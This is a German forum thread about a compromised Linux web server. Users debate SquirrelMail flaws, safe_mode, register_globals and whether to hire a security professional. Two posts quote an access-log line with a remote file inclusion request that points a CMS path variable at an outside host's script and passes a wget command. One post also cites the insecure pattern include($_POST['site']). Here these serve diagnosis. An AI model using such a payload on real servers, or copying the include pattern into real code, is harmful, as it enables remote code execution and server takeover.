http://www.rootforum.org/forum/viewtopic.php?t=29261Superdreadnought wrote:aber wenn du kein deutsch kannst ...
So und nun wieder back to topic!
http://www.rootforum.org/forum/viewtopic.php?t=29261Superdreadnought wrote:aber wenn du kein deutsch kannst ...
Seltener POST als häufiger $_GET['document']...rootsvr wrote:
Ansonsten bei selbsterstellter Webseite ist öfter mal ein include($_POST['site']) zu finden.
lol, ja ich habe was von iptables gehört :D :D (habe sogar ein BUCH darüber :D)schon mal was von iptables gehört?
hehe, nein. auch wenn ich faul bin - minimaleingabeprüfung mache ich schon :DAnsonsten bei selbsterstellter Webseite ist öfter mal ein include($_POST['site']) zu finden
^^ gute idee.Joe User wrote:So und nun wieder back to topic!
Möglicherweise eine Schwachstelle durch eine geforgte Mail?tcsoft wrote: von squirrelmail hab ich eine eher ältere version drauf - 1.4.6
Code: Select all
access.log.1:213.215.135.124 *MY-IP-ADDRESS* - [27/Oct/2006:14:50:46 +0200] "GET http://*MY-IP-ADDRESS*/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sanwall.by.ru/cmd/CMD.gif?&cmd=wget HTTP/1.0" 404 25
Eine Mail, mit der bei der Verarbeitung einer Mail oder beim Anklicken eines Links eine Lücke im Webmailer ausgenutzt werden soll. Es gab da gelegentliche Schwachstellen in Squirrelmail. Wenn Du intensive Squirrelnutzer hast, könnte es sein, dass solch eine Mail das Nachladen des Schadcodes veranlasst hat.tcsoft wrote: @MattiasS
geforgte mail?? was ist das :?:
^^ auf der seite findet man interessante sachen ...tcsoft wrote:in den logs find ich für das stichwort "wget" nur so sachen wieCode: Select all
access.log.1:213.215.135.124 *MY-IP-ADDRESS* - [27/Oct/2006:14:50:46 +0200] "GET http://*MY-IP-ADDRESS*/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sanwall.by.ru/cmd/CMD.gif?&cmd=wget HTTP/1.0" 404 25
Nichts, was man nicht schon von X anderen Seiten kennt.Superdreadnought wrote:^^ auf der seite findet man interessante sachen ...
Hätte auch nichts gebracht. Der zitierte Request hat ja sowieso einen Error 404 generiert. Davon abgesehen ist der safe_mode kaputt[tm] und register_globals deaktivieren macht nicht automatisch alle Skripte sicher.Superdreadnought wrote:da ist man doch froh, dass es secure globals und den safe mode gibt (ich vermute mal, du hattest die an, oder?).
hehe, da muss ich dich auf diesen thread verweisen http://www.rootforum.org/forum/viewtopic.php?p=271955da ist man doch froh, dass es secure globals und den safe mode gibt (ich vermute mal, du hattest die an, oder?).
wie meinst du das? (dass es nicht das gelbe vom security-ei ist, das ist klar)safe_mode kaputt
Code: Select all
register_globals = Off
Naja, safe_mode ist auch kein Wundermittel.tcsoft wrote:ja die sind ja sowieso off. safe_mode war ja auch immer on => nur hab bis jetzt nicht gemerkt, dass er nicht greift!!! 8O
Wohl nicht ansonsten wäre dein Startposting überflüssig. DU hast es nicht geschafft die Kiste sicher zu halten. Ein Profi (aka Bims wie du es sagt) denke ich hätte es.tcsoft wrote:ähm ja....
einspielen von sicherheitsupdates - das schaff ich alleine auch (sind ja recht wenig standard-php-applikationen drauf) und ein apt-get update/upgrade schaffe ich auch hin und wieder wenn ich zeit habe (täglich) :D :D :D
die paar security-anregungen kann ich mir auch so holen, OHNE dass ich so einen "Bims" engagiere (der im Endeffekt mehr kostet als er Nutzen hat)
jaja, passt schon wieder. für MEINE bedürfnisse auf DIESEM server brauche ICH keinen Linux-Security-Freak à 25Euro/h :Dcodc wrote:Wohl nicht ansonsten wäre dein Startposting überflüssig. DU hast es nicht geschafft die Kiste sicher zu halten. Ein Profi (aka Bims wie du es sagt) denke ich hätte es.
Das ganze zeigt nur was du für eine geringe Meinung von Leuten hast die sich damit auskennen. Ich bin kein IT-Profi sondern nur Admin von 3 Firmenservern und das neben meinem eigendlichen Job aber so was kotzt mich an ehrlich gesagt wenn ich so was lese. Ich habe jetzt 5 Jahre mit Linux auf Servern zu tun und hab mal aus Spass LPIC-1 gemacht und will auf dem LT LPIC-2 machen und bin immer noch erstaunt wie wenig ich eigendlich weiss. Aber noch keiner von mir betreuten Server ist je erfolgreich angegriffen worden.